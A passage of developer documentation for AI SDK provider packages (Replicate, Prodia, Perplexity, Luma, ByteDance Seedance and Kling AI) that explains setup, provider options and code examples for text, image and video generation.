model: replicate.image('black-forest-labs/flux-2-pro'),
prompt: {
text: 'Combine the style and subjects from the reference images',
images: [reference1, reference2],
},
});
Provider Options
Common provider options for image generation:
- maxWaitTimeInSeconds number - Maximum time in seconds to wait for the prediction to complete in sync mode. By default, Replicate uses sync mode with a 60-second timeout. Set to a positive number to use a custom duration (e.g., 120 for 2 minutes). When not specified, uses the default 60-second wait.
- guidance_scale number - Guidance scale for classifier-free guidance. Higher values make the output more closely match the prompt.
- num_inference_steps number - Number of denoising steps. More steps = higher quality but slower.
- negative_prompt string - Negative prompt to guide what to avoid in the generation.
- output_format 'png' | 'jpg' | 'webp' - Output image format.
- output_quality number (1-100) - Output image quality. Only applies to jpg and webp.
- strength number (0-1) - Strength of the transformation for img2img. Lower values keep more of the original image.
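As an illustrative sketch combining a few of these options (the values are examples only):
import { replicate } from '@ai-sdk/replicate';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: replicate.image('black-forest-labs/flux-dev'),
  prompt: 'The Loch Ness Monster getting a manicure',
  providerOptions: {
    replicate: {
      negative_prompt: 'blurry, distorted',
      output_format: 'jpg',
      output_quality: 90,
      maxWaitTimeInSeconds: 120, // wait up to 2 minutes in sync mode
    },
  },
});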
For more details, see the Replicate models page.
title: Prodia description: Learn how to use Prodia models with the AI SDK.
Prodia Provider
Prodia is a fast inference platform for generative AI, offering high-speed image generation with FLUX and Stable Diffusion models.
Setup
The Prodia provider is available via the @ai-sdk/prodia module. You can install it with
pnpm add @ai-sdk/prodia
Provider Instance
You can import the default provider instance prodia from @ai-sdk/prodia:
import { prodia } from '@ai-sdk/prodia';
If you need a customized setup, you can import createProdia and create a provider instance with your settings:
import { createProdia } from '@ai-sdk/prodia';
const prodia = createProdia({
apiKey: 'your-api-key', // optional, defaults to PRODIA_TOKEN environment variable
baseURL: 'custom-url', // optional
headers: {
/* custom headers */
}, // optional
});
You can use the following optional settings to customize the Prodia provider instance:
- baseURL string - Use a different URL prefix for API calls. The default prefix is https://inference.prodia.com/v2.
- apiKey string - API key that is being sent using the Authorization header as a Bearer token. It defaults to the PRODIA_TOKEN environment variable.
- headers Record<string,string> - Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response> - Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Image Models
You can create Prodia image models using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
Basic Usage
import { writeFileSync } from 'node:fs';
import { prodia } from '@ai-sdk/prodia';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: prodia.image('inference.flux-fast.schnell.txt2img.v2'),
prompt: 'A cat wearing an intricate robe',
});
const filename = `image-${Date.now()}.png`;
writeFileSync(filename, image.uint8Array);
console.log(`Image saved to ${filename}`);
Model Capabilities
Prodia offers fast inference for various image generation models. Here are the supported model types:
| Model | Description |
|---|---|
| inference.flux-fast.schnell.txt2img.v2 | Fast FLUX Schnell model for text-to-image generation |
| inference.flux.schnell.txt2img.v2 | FLUX Schnell model for text-to-image generation |
Image Size
You can specify the image size using the size parameter in WIDTHxHEIGHT format:
import { prodia } from '@ai-sdk/prodia';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: prodia.image('inference.flux-fast.schnell.txt2img.v2'),
prompt: 'A serene mountain landscape at sunset',
size: '1024x768',
});
Provider Options
Prodia image models support additional options through the providerOptions.prodia object:
import { prodia, type ProdiaImageModelOptions } from '@ai-sdk/prodia';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: prodia.image('inference.flux-fast.schnell.txt2img.v2'),
prompt: 'A cat wearing an intricate robe',
providerOptions: {
prodia: {
width: 1024,
height: 768,
steps: 4,
stylePreset: 'cinematic',
} satisfies ProdiaImageModelOptions,
},
});
The following provider options are supported:
- width number - Output width in pixels (256–1920). When set, this overrides any width derived from size.
- height number - Output height in pixels (256–1920). When set, this overrides any height derived from size.
- steps number - Number of computational iterations (1–4). More steps typically produce higher quality results.
- stylePreset string - Apply a visual theme to the output image. Supported presets: 3d-model, analog-film, anime, cinematic, comic-book, digital-art, enhance, fantasy-art, isometric, line-art, low-poly, neon-punk, origami, photographic, pixel-art, texture, craft-clay.
- loras string[] - Augment the output with up to 3 LoRA models.
- progressive boolean - When using JPEG output, return a progressive JPEG.
Seed
You can use the seed parameter to get reproducible results:
import { prodia } from '@ai-sdk/prodia';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: prodia.image('inference.flux-fast.schnell.txt2img.v2'),
prompt: 'A serene mountain landscape at sunset',
seed: 12345,
});
Provider Metadata
The generateImage response includes provider-specific metadata in providerMetadata.prodia.images[]. Each image object may contain the following properties:
- jobId string - The unique identifier for the generation job.
- seed number - The seed used for generation. Useful for reproducing results.
- elapsed number - Generation time in seconds.
- iterationsPerSecond number - Processing speed metric.
- createdAt string - Timestamp when the job was created.
- updatedAt string - Timestamp when the job was last updated.
import { prodia } from '@ai-sdk/prodia';
import { generateImage } from 'ai';
const { image, providerMetadata } = await generateImage({
model: prodia.image('inference.flux-fast.schnell.txt2img.v2'),
prompt: 'A serene mountain landscape at sunset',
});
// Access provider metadata
const metadata = providerMetadata?.prodia?.images?.[0];
console.log('Job ID:', metadata?.jobId);
console.log('Seed:', metadata?.seed);
console.log('Elapsed:', metadata?.elapsed);
title: Perplexity description: Learn how to use Perplexity's Sonar API with the AI SDK.
Perplexity Provider
The Perplexity provider offers access to Sonar API - a language model that uniquely combines real-time web search with natural language processing. Each response is grounded in current web data and includes detailed citations, making it ideal for research, fact-checking, and obtaining up-to-date information.
API keys can be obtained from the Perplexity Platform.
Setup
The Perplexity provider is available via the @ai-sdk/perplexity module. You can install it with:
pnpm add @ai-sdk/perplexity
Provider Instance
You can import the default provider instance perplexity from @ai-sdk/perplexity:
import { perplexity } from '@ai-sdk/perplexity';
For custom configuration, you can import createPerplexity and create a provider instance with your settings:
import { createPerplexity } from '@ai-sdk/perplexity';
const perplexity = createPerplexity({
apiKey: process.env.PERPLEXITY_API_KEY ?? '',
});
You can use the following optional settings to customize the Perplexity provider instance:
- baseURL string - Use a different URL prefix for API calls. The default prefix is https://api.perplexity.ai.
- apiKey string - API key that is being sent using the Authorization header. It defaults to the PERPLEXITY_API_KEY environment variable.
- headers Record<string,string> - Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response> - Custom fetch implementation.
Language Models
You can create Perplexity models using a provider instance:
import { perplexity } from '@ai-sdk/perplexity';
import { generateText } from 'ai';
const { text } = await generateText({
model: perplexity('sonar-pro'),
prompt: 'What are the latest developments in quantum computing?',
});
Sources
Websites that have been used to generate the response are included in the sources property of the result:
import { perplexity } from '@ai-sdk/perplexity';
import { generateText } from 'ai';
const { text, sources } = await generateText({
model: perplexity('sonar-pro'),
prompt: 'What are the latest developments in quantum computing?',
});
console.log(sources);
Provider Options & Metadata
The Perplexity provider includes additional metadata in the response through providerMetadata.
Additional configuration options are available through providerOptions.
const result = await generateText({
model: perplexity('sonar-pro'),
prompt: 'What are the latest developments in quantum computing?',
providerOptions: {
perplexity: {
return_images: true, // Enable image responses (Tier-2 Perplexity users only)
search_recency_filter: 'week', // Filter search results by recency
},
},
});
console.log(result.providerMetadata);
// Example output:
// {
// perplexity: {
// usage: { citationTokens: 5286, numSearchQueries: 1 },
// images: [
// { imageUrl: "https://example.com/image1.jpg", originUrl: "https://elsewhere.com/page1", height: 1280, width: 720 },
// { imageUrl: "https://example.com/image2.jpg", originUrl: "https://elsewhere.com/page2", height: 1280, width: 720 }
// ]
// },
// }
Provider Options
The following provider-specific options are available:
- return_images boolean - Enable image responses. When set to true, the response may include relevant images. This feature is only available to Perplexity Tier-2 users and above.
- search_recency_filter string - Filter search results by recency. Possible values: 'hour', 'day', 'week', 'month'. If not specified, defaults to all time.
Provider Metadata
The response metadata includes:
- usage: Object containing citationTokens and numSearchQueries metrics
- images: Array of image objects when return_images is enabled (Tier-2 users only). Each image contains imageUrl, originUrl, height, and width.
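As a sketch, continuing from the example above, both fields can be read off the metadata:
const perplexityMetadata = result.providerMetadata?.perplexity;
console.log('usage:', perplexityMetadata?.usage);
// images is only present when return_images is enabled (Tier-2 and above)
console.log('images:', perplexityMetadata?.images);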
PDF Support
The Perplexity provider supports reading PDF files.
You can pass PDF files as part of the message content using the file type:
import fs from 'node:fs';
import { perplexity } from '@ai-sdk/perplexity';
import { generateText } from 'ai';

const result = await generateText({
model: perplexity('sonar-pro'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is this document about?',
},
{
type: 'file',
data: fs.readFileSync('./data/ai.pdf'),
mediaType: 'application/pdf',
filename: 'ai.pdf', // optional
},
],
},
],
});
You can also pass the URL of a PDF:
{
type: 'file',
data: new URL('https://example.com/document.pdf'),
mediaType: 'application/pdf',
filename: 'document.pdf', // optional
}
The model will have access to the contents of the PDF file and respond to questions about it.
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| sonar-deep-research | | | | |
| sonar-reasoning-pro | | | | |
| sonar-reasoning | | | | |
| sonar-pro | | | | |
| sonar | | | | |
title: Luma description: Learn how to use Luma AI models with the AI SDK.
Luma Provider
Luma AI provides state-of-the-art image generation models through their Dream Machine platform. Their models offer ultra-high quality image generation with superior prompt understanding and unique capabilities like character consistency and multi-image reference support.
Setup
The Luma provider is available via the @ai-sdk/luma module. You can install it with
pnpm add @ai-sdk/luma
Provider Instance
You can import the default provider instance luma from @ai-sdk/luma:
import { luma } from '@ai-sdk/luma';
If you need a customized setup, you can import createLuma and create a provider instance with your settings:
import { createLuma } from '@ai-sdk/luma';
const luma = createLuma({
apiKey: 'your-api-key', // optional, defaults to LUMA_API_KEY environment variable
baseURL: 'custom-url', // optional
headers: {
/* custom headers */
}, // optional
});
You can use the following optional settings to customize the Luma provider instance:
- baseURL string - Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.lumalabs.ai.
- apiKey string - API key that is being sent using the Authorization header. It defaults to the LUMA_API_KEY environment variable.
- headers Record<string,string> - Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response> - Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Image Models
You can create Luma image models using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
Basic Usage
import { luma, type LumaImageModelOptions } from '@ai-sdk/luma';
import { generateImage } from 'ai';
import fs from 'fs';
const { image } = await generateImage({
model: luma.image('photon-1'),
prompt: 'A serene mountain landscape at sunset',
aspectRatio: '16:9',
});
const filename = `image-${Date.now()}.png`;
fs.writeFileSync(filename, image.uint8Array);
console.log(`Image saved to ${filename}`);
Image Model Settings
You can customize the generation behavior with optional settings:
const { image } = await generateImage({
model: luma.image('photon-1'),
prompt: 'A serene mountain landscape at sunset',
aspectRatio: '16:9',
maxImagesPerCall: 1, // Maximum number of images to generate per API call
providerOptions: {
luma: {
pollIntervalMillis: 5000, // How often to check for completed images (in ms)
maxPollAttempts: 10, // Maximum number of polling attempts before timeout
} satisfies LumaImageModelOptions,
},
});
Since Luma processes images through an asynchronous queue system, these settings allow you to tune the polling behavior:
- `maxImagesPerCall` (number): Override the maximum number of images generated per API call. Defaults to 1.
- `pollIntervalMillis` (number): Control how frequently the API is checked for completed images while they are being processed. Defaults to 500ms.
- `maxPollAttempts` (number): Limit how long to wait for results before timing out, since image generation is queued asynchronously. Defaults to 120 attempts.

With the defaults (500ms × 120 attempts), polling gives up after roughly one minute.
Model Capabilities
Luma offers two main models:
| Model | Description |
|---|---|
| `photon-1` | High-quality image generation with superior prompt understanding |
| `photon-flash-1` | Faster generation optimized for speed while maintaining quality |
Both models support the following aspect ratios:
- 1:1
- 3:4
- 4:3
- 9:16
- 16:9 (default)
- 9:21
- 21:9
For more details about supported aspect ratios, see the Luma Image Generation documentation.
Key features of Luma models include:
- Ultra-high quality image generation
- 10x higher cost efficiency compared to similar models
- Superior prompt understanding and adherence
- Unique character consistency capabilities from single reference images
- Multi-image reference support for precise style matching
Image editing
Luma supports different modes of generating images that reference other images.
Modify an image
Images must be passed as URLs. A weight can be configured for each image in the providerOptions.luma.images array.
await generateImage({
model: luma.image('photon-flash-1'),
prompt: {
text: 'transform the bike to a boat',
images: [
'https://hebbkx1anhila5yf.public.blob.vercel-storage.com/future-me-8hcBWcZOkbE53q3gshhEm16S87qDpF.jpeg',
],
},
providerOptions: {
luma: {
referenceType: 'modify_image',
images: [{ weight: 1.0 }],
} satisfies LumaImageModelOptions,
},
});
Learn more at https://docs.lumalabs.ai/docs/image-generation#modify-image.
Reference an image
Use up to 4 reference images to guide your generation. Useful for creating variations or visualizing complex concepts. Adjust the weight for each image (0-1) to control the influence of reference images.
await generateImage({
model: luma.image('photon-flash-1'),
prompt: {
text: 'A salamander at dusk in a forest pond, in the style of ukiyo-e',
images: [
'https://hebbkx1anhila5yf.public.blob.vercel-storage.com/future-me-8hcBWcZOkbE53q3gshhEm16S87qDpF.jpeg',
],
},
aspectRatio: '1:1',
providerOptions: {
luma: {
referenceType: 'image',
images: [{ weight: 0.8 }],
} satisfies LumaImageModelOptions,
},
});
Learn more at https://docs.lumalabs.ai/docs/image-generation#image-reference
Style Reference
Apply specific visual styles to your generations using reference images. Control the style influence using the weight parameter.
await generateImage({
model: luma.image('photon-flash-1'),
prompt: {
text: 'A blue cream Persian cat launching its website on Vercel',
images: [
'https://hebbkx1anhila5yf.public.blob.vercel-storage.com/future-me-8hcBWcZOkbE53q3gshhEm16S87qDpF.jpeg',
],
},
aspectRatio: '1:1',
providerOptions: {
luma: {
referenceType: 'style',
images: [{ weight: 0.8 }],
} satisfies LumaImageModelOptions,
},
});
Learn more at https://docs.lumalabs.ai/docs/image-generation#style-reference
Character Reference
Create consistent and personalized characters using up to 4 reference images of the same subject. More reference images improve character representation.
await generateImage({
model: luma.image('photon-flash-1'),
prompt: {
text: 'A woman with a cat riding a broomstick in a forest',
images: [
'https://hebbkx1anhila5yf.public.blob.vercel-storage.com/future-me-8hcBWcZOkbE53q3gshhEm16S87qDpF.jpeg',
],
},
aspectRatio: '1:1',
providerOptions: {
luma: {
referenceType: 'character',
images: [
{
id: 'identity0',
},
],
} satisfies LumaImageModelOptions,
},
});
Learn more at https://docs.lumalabs.ai/docs/image-generation#character-reference
---
title: ByteDance
description: Learn how to use ByteDance Seedance video models with the AI SDK.
---
ByteDance Provider
The ByteDance provider contains support for the Seedance family of video generation models through the BytePlus ModelArk platform. Seedance provides high-quality text-to-video and image-to-video generation capabilities, including audio-video synchronization, first-and-last frame control, and multi-reference image generation.
Setup
The ByteDance provider is available via the @ai-sdk/bytedance module. You can install it with
pnpm add @ai-sdk/bytedance
Provider Instance
You can import the default provider instance byteDance from @ai-sdk/bytedance:
import { byteDance } from '@ai-sdk/bytedance';
If you need a customized setup, you can import createByteDance and create a provider instance with your settings:
import { createByteDance } from '@ai-sdk/bytedance';
const byteDance = createByteDance({
apiKey: 'your-api-key', // optional, defaults to ARK_API_KEY environment variable
baseURL: 'custom-url', // optional
headers: {
/* custom headers */
}, // optional
});
You can use the following optional settings to customize the ByteDance provider instance:
- `baseURL` (string): Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is `https://ark.ap-southeast.bytepluses.com/api/v3`.
- `apiKey` (string): API key that is being sent using the `Authorization` header. It defaults to the `ARK_API_KEY` environment variable. You can obtain an API key from the BytePlus console.
- `headers` (Record<string,string>): Custom headers to include in the requests.
- `fetch` ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Video Models
You can create ByteDance video models using the .video() factory method.
For more on video generation with the AI SDK see generateVideo().
Text-to-Video
Generate videos from text prompts:
import {
byteDance,
type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: byteDance.video('seedance-1-0-pro-250528'),
prompt:
'Photorealistic style: Under a clear blue sky, a vast expanse of white daisy fields stretches out. The camera gradually zooms in and fixates on a close-up of a single daisy.',
aspectRatio: '16:9',
duration: 5,
providerOptions: {
bytedance: {
watermark: false,
} satisfies ByteDanceVideoProviderOptions,
},
});
console.log(video.url);
Image-to-Video
Generate videos from a first-frame image with an optional text prompt:
import {
byteDance,
type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: byteDance.video('seedance-1-5-pro-251215'),
prompt: {
image: 'https://example.com/first-frame.png',
text: 'The cat slowly turns its head and blinks',
},
duration: 5,
providerOptions: {
bytedance: {
watermark: false,
} satisfies ByteDanceVideoProviderOptions,
},
});
Image-to-Video with Audio
Seedance 1.5 Pro supports generating synchronized audio alongside the video:
import {
byteDance,
type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: byteDance.video('seedance-1-5-pro-251215'),
prompt: {
image: 'https://example.com/pianist.png',
text: 'A young man sits at a piano, playing calmly. Gentle piano music plays in sync with his movements.',
},
duration: 5,
providerOptions: {
bytedance: {
generateAudio: true,
watermark: false,
} satisfies ByteDanceVideoProviderOptions,
},
});
First-and-Last Frame Video
Generate smooth transitions between a starting and ending keyframe image:
import {
byteDance,
type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: byteDance.video('seedance-1-5-pro-251215'),
prompt: {
image: 'https://example.com/first-frame.jpg',
text: 'Create a 360-degree orbiting camera shot based on this photo',
},
duration: 5,
providerOptions: {
bytedance: {
lastFrameImage: 'https://example.com/last-frame.jpg',
generateAudio: true,
watermark: false,
} satisfies ByteDanceVideoProviderOptions,
},
});
Multi-Reference Image-to-Video
Using the Seedance 1.0 Lite I2V model, you can provide multiple reference images (1-4) that the model uses to faithfully reproduce object shapes, colors, and textures:
import {
byteDance,
type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: byteDance.video('seedance-1-0-lite-i2v-250428'),
prompt:
'A boy wearing glasses and a blue T-shirt from [Image 1] and a corgi dog from [Image 2], sitting on the lawn from [Image 3], in 3D cartoon style',
aspectRatio: '16:9',
duration: 5,
providerOptions: {
bytedance: {
referenceImages: [
'https://example.com/boy.png',
'https://example.com/corgi.png',
'https://example.com/lawn.png',
],
watermark: false,
} satisfies ByteDanceVideoProviderOptions,
},
});
Reference Video
Seedance 2.0 supports reference videos that guide the style, motion, or composition of the generated video:
import {
byteDance,
type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: byteDance.video('dreamina-seedance-2-0-260128'),
prompt:
'First-person perspective promotional ad, using the composition and camera movement from the reference video',
aspectRatio: '16:9',
duration: 4,
providerOptions: {
bytedance: {
referenceVideos: ['https://example.com/reference-video.mp4'],
watermark: false,
} satisfies ByteDanceVideoProviderOptions,
},
});
Reference Audio
Seedance 2.0 supports reference audio that is used as background music or sound for the generated video:
import {
byteDance,
type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: byteDance.video('dreamina-seedance-2-0-260128'),
prompt:
'A serene mountain landscape at sunrise with gentle camera movement',
aspectRatio: '16:9',
duration: 4,
providerOptions: {
bytedance: {
referenceAudio: ['https://example.com/background-music.mp3'],
generateAudio: true,
watermark: false,
} satisfies ByteDanceVideoProviderOptions,
},
});
Video Provider Options
The following provider options are available via providerOptions.bytedance:
Generation Options
- `watermark` (boolean): Whether to add a watermark to the generated video.
- `generateAudio` (boolean): Whether to generate synchronized audio for the video. Only supported by Seedance 1.5 Pro.
- `cameraFixed` (boolean): Whether to fix the camera during generation.
- `returnLastFrame` (boolean): Whether to return the last frame of the generated video. Useful for chaining consecutive videos.
- `serviceTier` ('default' | 'flex'): Inference tier. `'default'` for online inference; `'flex'` for offline inference at 50% of the price, with higher latency (response times on the order of hours).
- `draft` (boolean): Enable draft sample mode for low-cost preview generation. Only supported by Seedance 1.5 Pro. Generates a 480p preview video for rapid iteration before committing to a full-quality generation (see the sketch after the Polling Options list).
Image Input Options
- `lastFrameImage` (string): URL of the last frame image for first-and-last frame video generation. The model generates smooth transitions between the first frame (provided via the `image` prompt) and this last frame. Supported by Seedance 1.5 Pro, 1.0 Pro, and 1.0 Lite I2V.
- `referenceImages` (string[]): Array of reference image URLs (1-4 images) for multi-reference image-to-video generation. The model extracts key features from each image and reproduces them in the video. Use `[Image 1]`, `[Image 2]`, etc. in your prompt to reference specific images. Supported by Seedance 1.0 Lite I2V.
Media Reference Options
- `referenceVideos` (string[]): Array of reference video URLs (up to 3 videos, max 15 seconds each) for reference-guided video generation. The model uses the referenced videos to guide style, motion, or composition. Supported by Seedance 2.0.
- `referenceAudio` (string[]): Array of reference audio URLs (up to 3, max 15 seconds each) for audio-guided video generation. The model uses the referenced audio as background music or synchronized sound. Supports data URIs (e.g., `data:audio/wav;base64,...`). Supported by Seedance 2.0.
Polling Options
- `pollIntervalMs` (number): Control how frequently the API is checked for completed videos while they are being processed. Defaults to 3000ms.
- `pollTimeoutMs` (number): Maximum time to wait for video generation to complete before timing out. Defaults to 300000ms (5 minutes).
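As a sketch of how these generation options combine in practice, the example below requests a low-cost draft preview on Seedance 1.5 Pro routed to the flex tier. Whether draft mode and the flex tier can be combined on a single request is an assumption, and the prompt is illustrative.

```ts
import {
  byteDance,
  type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: byteDance.video('seedance-1-5-pro-251215'),
  prompt: 'A paper boat drifting down a rain-soaked street, cinematic lighting',
  duration: 5,
  providerOptions: {
    bytedance: {
      draft: true, // 480p preview for rapid iteration (Seedance 1.5 Pro only)
      serviceTier: 'flex', // lower-cost offline inference, higher latency (assumption: combinable with draft)
      watermark: false,
    } satisfies ByteDanceVideoProviderOptions,
  },
});

console.log(video.url);
```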
Video Model Capabilities
| Model | Model ID | Capabilities |
|---|---|---|
| Seedance 2.0 | `dreamina-seedance-2-0-260128` | T2V, I2V, reference videos (up to 3), reference audio (up to 3), audio-video sync. Duration: 4-15s. Resolution: 480p, 720p. |
| Seedance 2.0 Fast | `dreamina-seedance-2-0-fast-260128` | T2V, I2V, reference videos (up to 3), reference audio (up to 3), audio-video sync. Optimized for speed. Duration: 4-15s. Resolution: 480p, 720p. |
| Seedance 1.5 Pro | `seedance-1-5-pro-251215` | T2V, I2V (first frame), I2V (first+last frame), audio-video sync, draft mode. Duration: 4-12s. Resolution: 480p, 720p, 1080p. |
| Seedance 1.0 Pro | `seedance-1-0-pro-250528` | T2V, I2V (first frame), I2V (first+last frame). Duration: 2-12s. Resolution: 480p, 720p, 1080p. |
| Seedance 1.0 Pro Fast | `seedance-1-0-pro-fast-251015` | T2V, I2V (first frame). Optimized for speed and cost. Duration: 2-12s. |
| Seedance 1.0 Lite (T2V) | `seedance-1-0-lite-t2v-250428` | Text-to-video only. Duration: 2-12s. Resolution: 480p, 720p, 1080p. |
| Seedance 1.0 Lite (I2V) | `seedance-1-0-lite-i2v-250428` | I2V (first frame), I2V (first+last frame), multi-reference images (1-4). Duration: 2-12s. Resolution: 480p, 720p. |
Supported aspect ratios: 16:9, 4:3, 1:1, 3:4, 9:16, 21:9, adaptive (image-to-video only).
All models output MP4 video at 24 fps.
---
title: Kling AI
description: Learn how to use the Kling AI provider for the AI SDK.
---
Kling AI Provider
The Kling AI provider contains support for Kling AI's video generation models, including text-to-video, image-to-video, motion control, and multi-shot video generation.
Setup
The Kling AI provider is available in the @ai-sdk/klingai module. You can install it with
pnpm add @ai-sdk/klingai
Provider Instance
You can import the default provider instance klingai from @ai-sdk/klingai:
import { klingai } from '@ai-sdk/klingai';
If you need a customized setup, you can import createKlingAI from @ai-sdk/klingai and create a provider instance with your settings:
import { createKlingAI } from '@ai-sdk/klingai';
const klingai = createKlingAI({
accessKey: 'your-access-key',
secretKey: 'your-secret-key',
});
You can use the following optional settings to customize the Kling AI provider instance:
- `accessKey` (string): Kling AI access key. Defaults to the `KLINGAI_ACCESS_KEY` environment variable.
- `secretKey` (string): Kling AI secret key. Defaults to the `KLINGAI_SECRET_KEY` environment variable.
- `baseURL` (string): Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is `https://api-singapore.klingai.com`.
- `headers` (Record<string,string>): Custom headers to include in the requests.
- `fetch` ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Video Models
You can create Kling AI video models using the .video() factory method.
For more on video generation with the AI SDK see generateVideo().
This provider currently supports three video generation modes: text-to-video, image-to-video, and motion control.
Text-to-Video
Generate videos from text prompts:
import { klingai, type KlingAIVideoModelOptions } from '@ai-sdk/klingai';
import { experimental_generateVideo as generateVideo } from 'ai';
const { videos } = await generateVideo({
model: klingai.video('kling-v2.6-t2v'),
prompt: 'A chicken flying into the sunset in the style of 90s anime.',
aspectRatio: '16:9',
duration: 5,
providerOptions: {
klingai: {
mode: 'std',
} satisfies KlingAIVideoModelOptions,
},
});
Image-to-Video
Generate videos from a start frame image with an optional text prompt. The popular start+end frame feature is available via the imageTail option:
import { klingai, type KlingAIVideoModelOptions } from '@ai-sdk/klingai';
import { experimental_generateVideo as generateVideo } from 'ai';
const { videos } = await generateVideo({
model: klingai.video('kling-v2.6-i2v'),
prompt: {
image: 'https://example.com/start-frame.png',
text: 'The cat slowly turns its head and blinks',
},
duration: 5,
providerOptions: {
klingai: {
// Pro mode required for start+end frame control
mode: 'pro',
// Optional: end frame image
imageTail: 'https://example.com/end-frame.png',
} satisfies KlingAIVideoModelOptions,
},
});
Multi-Shot Video Generation
Generate videos with multiple storyboard shots, each with its own prompt and duration (Kling v3.0+):
import { klingai, type KlingAIVideoModelOptions } from '@ai-sdk/klingai';
import { experimental_generateVideo as generateVideo } from 'ai';
const { videos } = await generateVideo({
model: klingai.video('kling-v3.0-t2v'),
prompt: '',
aspectRatio: '16:9',
duration: 10,
providerOptions: {
klingai: {
mode: 'pro',
multiShot: true,
shotType: 'customize',
multiPrompt: [
{
index: 1,
prompt: 'A sunrise over a calm ocean, warm golden light.',
duration: '4',
},
{
index: 2,
prompt: 'A flock of seagulls take flight from the beach.',
duration: '3',
},
{
index: 3,
prompt: 'Waves crash against rocky cliffs at sunset.',
duration: '3',
},
],
sound: 'on',
} satisfies KlingAIVideoModelOptions,
},
});
Multi-shot also works with image-to-video by combining a start frame image with per-shot prompts.
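If you prefer to let the model segment the storyboard itself, a minimal sketch of the 'intelligence' shot type (per the option descriptions later on this page) looks like this; the prompt is illustrative:

```ts
import { klingai, type KlingAIVideoModelOptions } from '@ai-sdk/klingai';
import { experimental_generateVideo as generateVideo } from 'ai';

const { videos } = await generateVideo({
  model: klingai.video('kling-v3.0-t2v'),
  prompt: 'A day at the coast: sunrise, seagulls taking flight, waves at sunset.',
  aspectRatio: '16:9',
  duration: 10,
  providerOptions: {
    klingai: {
      mode: 'pro',
      multiShot: true,
      // 'intelligence' lets the model auto-segment shots from the main prompt,
      // so no multiPrompt array is needed.
      shotType: 'intelligence',
    } satisfies KlingAIVideoModelOptions,
  },
});
```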
Motion Control
Generate video by transferring motion from a reference video to a character image:
import { klingai, type KlingAIVideoModelOptions } from '@ai-sdk/klingai';
import { experimental_generateVideo as generateVideo } from 'ai';
const { videos } = await generateVideo({
model: klingai.video('kling-v3.0-motion-control'),
prompt: {
image: 'https://example.com/character.png',
text: 'The character performs a smooth dance move',
},
providerOptions: {
klingai: {
videoUrl: 'https://example.com/reference-motion.mp4',
characterOrientation: 'image',
mode: 'std',
// Optional: reference element from element library (v3.0+, max 1)
elementList: [{ element_id: 829836802793406551 }],
} satisfies KlingAIVideoModelOptions,
},
});
Video Provider Options
The following provider options are available via providerOptions.klingai. Options vary by mode; see the KlingAI Capability Map for per-model support.
Common Options
- `mode` ('std' | 'pro'): Video generation mode. `'std'` is cost-effective; `'pro'` produces higher quality but takes longer.
- `pollIntervalMs` (number): Polling interval in milliseconds for checking task status. Defaults to 5000.
- `pollTimeoutMs` (number): Maximum wait time in milliseconds for video generation. Defaults to 600000 (10 minutes).
- `watermarkEnabled` (boolean): Whether to generate watermarked results simultaneously.
Text-to-Video and Image-to-Video Options
- `negativePrompt` (string): A description of what to avoid in the generated video (max 2500 characters).
- `sound` ('on' | 'off'): Whether to generate audio simultaneously. Only V2.6 and later models support this, and it requires `mode: 'pro'`.
- `cfgScale` (number): Flexibility in video generation. Higher values mean stronger prompt adherence. Range: [0, 1]. Not supported by V2.x models.
- `cameraControl` (object): Camera movement control with a `type` preset (`'simple'`, `'down_back'`, `'forward_up'`, `'right_turn_forward'`, `'left_turn_forward'`) and an optional `config` with `horizontal`, `vertical`, `pan`, `tilt`, `roll`, and `zoom` values (range: [-10, 10]). See the sketch after this list.
- `multiShot` (boolean): Enable multi-shot video generation (Kling v3.0+). When true, the video is split into up to 6 storyboard shots with individual prompts and durations.
- `shotType` ('customize' | 'intelligence'): Storyboard method for multi-shot generation. `'customize'` uses `multiPrompt` for user-defined shots; `'intelligence'` lets the model auto-segment based on the main prompt. Required when `multiShot` is true.
- `multiPrompt` (Array<{index, prompt, duration}>): Per-shot details for multi-shot generation. Each shot has an `index` (number), `prompt` (string, max 512 characters), and `duration` (string, in seconds). Shot durations must sum to the total duration. Required when `multiShot` is true and `shotType` is `'customize'`.
